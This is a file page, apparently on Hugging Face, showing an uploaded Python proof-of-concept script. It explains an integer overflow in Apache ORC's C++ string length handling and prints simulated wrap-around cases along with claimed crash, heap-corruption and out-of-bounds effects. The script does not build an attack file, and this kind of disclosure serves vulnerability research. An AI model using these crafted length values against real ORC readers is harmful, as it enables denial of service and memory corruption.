Upload poc_orc_string_overflow.py with huggingface_hub
Browse files- poc_orc_string_overflow.py +67 -0
poc_orc_string_overflow.py
ADDED
|
@@ -0,0 +1,67 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/usr/bin/env python3
|
| 2 |
+
"""
|
| 3 |
+
PoC: Apache ORC String Length Integer Overflow
|
| 4 |
+
===============================================
|
| 5 |
+
|
| 6 |
+
Root cause: ColumnReader.cc:697
|
| 7 |
+
totalLength += static_cast<size_t>(lengths[i]);
|
| 8 |
+
// lengths[i] is int64_t from unsigned RLE decoder — NO negative check
|
| 9 |
+
|
| 10 |
+
String lengths decoded by unsigned RLE (isSigned=false, line 645)
|
| 11 |
+
are stored as int64_t. Values >= 2^63 become negative. static_cast<size_t>
|
| 12 |
+
on negative int64_t produces huge size_t → OOM or wrap-to-zero.
|
| 13 |
+
"""
|
| 14 |
+
import struct
|
| 15 |
+
|
| 16 |
+
def show_overflow():
|
| 17 |
+
print("ORC StringDirectColumnReader::computeSize() Integer Overflow")
|
| 18 |
+
print("=" * 60)
|
| 19 |
+
print()
|
| 20 |
+
print("Vulnerable code (ColumnReader.cc:691-706):")
|
| 21 |
+
print(" size_t totalLength = 0;")
|
| 22 |
+
print(" for (i = 0; i < numValues; ++i)")
|
| 23 |
+
print(" totalLength += static_cast<size_t>(lengths[i]); // NO CHECK!")
|
| 24 |
+
print()
|
| 25 |
+
print("How negative lengths occur:")
|
| 26 |
+
print(" 1. RLE decoder is unsigned (isSigned=false, line 645)")
|
| 27 |
+
print(" 2. Output stored in int64_t* (line 715-718)")
|
| 28 |
+
print(" 3. uint64 values >= 2^63 become negative int64_t")
|
| 29 |
+
print(" 4. static_cast<size_t>(negative) = huge positive")
|
| 30 |
+
print()
|
| 31 |
+
|
| 32 |
+
test_cases = [
|
| 33 |
+
("OOM DoS: single huge length", [2**63]),
|
| 34 |
+
("Wrap to 0: two lengths", [2**64 - 1, 1]),
|
| 35 |
+
("Wrap to 1: crafted pair", [2**64 - 100, 101]),
|
| 36 |
+
]
|
| 37 |
+
|
| 38 |
+
for desc, uint_lengths in test_cases:
|
| 39 |
+
print(f"Case: {desc}")
|
| 40 |
+
total = 0
|
| 41 |
+
for ul in uint_lengths:
|
| 42 |
+
as_int64 = struct.unpack('q', struct.pack('Q', ul % (2**64)))[0]
|
| 43 |
+
as_size_t = ul % (2**64)
|
| 44 |
+
total = (total + as_size_t) % (2**64)
|
| 45 |
+
print(f" RLE uint64={ul:#018x} -> int64={as_int64} -> size_t={as_size_t:#018x}")
|
| 46 |
+
print(f" totalLength = {total} ({total:#018x})")
|
| 47 |
+
if total == 0:
|
| 48 |
+
print(" -> blob.resize(0) -> EMPTY BLOB")
|
| 49 |
+
print(" -> ptr += lengths[i] with negative -> WILD POINTER -> OOB read")
|
| 50 |
+
elif total < 1000:
|
| 51 |
+
print(f" -> blob.resize({total}) -> UNDERSIZED BUFFER")
|
| 52 |
+
print(" -> actual data > blob size -> HEAP CORRUPTION")
|
| 53 |
+
elif total > 2**40:
|
| 54 |
+
print(f" -> blob.resize({total}) -> ALLOCATION FAILURE -> OOM CRASH")
|
| 55 |
+
print()
|
| 56 |
+
|
| 57 |
+
print("Additional: Stripe offset overflow (Reader.cc:591)")
|
| 58 |
+
print(" stripeFooterStart = offset + index_length + data_length")
|
| 59 |
+
print(" All uint64 from protobuf, no overflow check")
|
| 60 |
+
print(" -> wraps around -> reads wrong file location")
|
| 61 |
+
print()
|
| 62 |
+
print("ORC C++ has ZERO safe arithmetic in core parsing code")
|
| 63 |
+
print(" Reader.cc: 0 overflow checks in 1830 lines")
|
| 64 |
+
print(" ColumnReader.cc: 0 overflow checks in 1793 lines")
|
| 65 |
+
|
| 66 |
+
if __name__ == "__main__":
|
| 67 |
+
show_overflow()
|